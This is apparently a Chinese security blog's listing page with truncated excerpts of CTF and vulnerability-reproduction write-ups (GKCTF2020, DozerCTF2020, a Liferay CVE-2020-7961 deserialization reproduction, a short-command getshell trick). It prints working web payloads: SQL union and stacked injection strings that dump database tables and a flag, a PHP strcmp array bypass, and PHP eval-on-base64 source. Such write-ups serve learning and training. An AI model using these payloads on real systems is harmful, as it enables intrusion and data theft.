中计量现科CTF竞赛

easyweb 源码忘了脱下来,大概考察PHP strcmp()函数,直接数组绕过 ?password[]=shit 成绩单 白给题,Union注入无任何过滤,上来直接一血 id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()# //fl4g,sc id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='fl4g'# //flag id=-1' union select 1,flag,3,4 from fl4g# //flag{Sql_INJECT0N_4813drd8hz4} shop 考点:条件竞争 说实话一开始以……

GKCTF2020复现

GKCTF,题好平台棒,因为那段时间比赛太多就没打,现在填坑 CheckIN 考点:PHP73 bypass disable_functions 打开题目是源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this->decode = @base64_decode( $this->code ); @Eval($this->decode); } public function x() { return $_REQUEST; } } new ClassName(); 目标很明确,传入 ?Ginkg……

CVE-2020-7961 Liferay Portal 反序列化-复现

漏洞说明 Liferay是一个开源的Portal产品,提供对多个独立系统的内容集成,为企业信息、流程等的整合提供了一套完整的解决方案,和其他商业产品相比,Liferay有着很多优良的特性,而且免费,在全……

DozerCTF2020_web

又是一场把萌新骗过去杀的比赛,弹计算器好玩,域渗透不会,xxe盲打ssrf学到了 sqli-labs 0 考点:URL二次编码,堆叠注入 堆叠其实很简单,也发现什么过滤,主要是二次编码有点坑。。。 查看库名: ?id=1%2527;show%20databases;%23 查看表名: ?id=1%2527;show%20tables;%23 查看……

绕过4-5个字符限制getshell

这个东西起源于HITCON CTF 2017的一道题,高校战疫Hack Me也曾经出现过,最近突然做到了来说一下 参考:https://www.anquanke.com/post/id/87203 源码 五字版本 <?php $sandbox……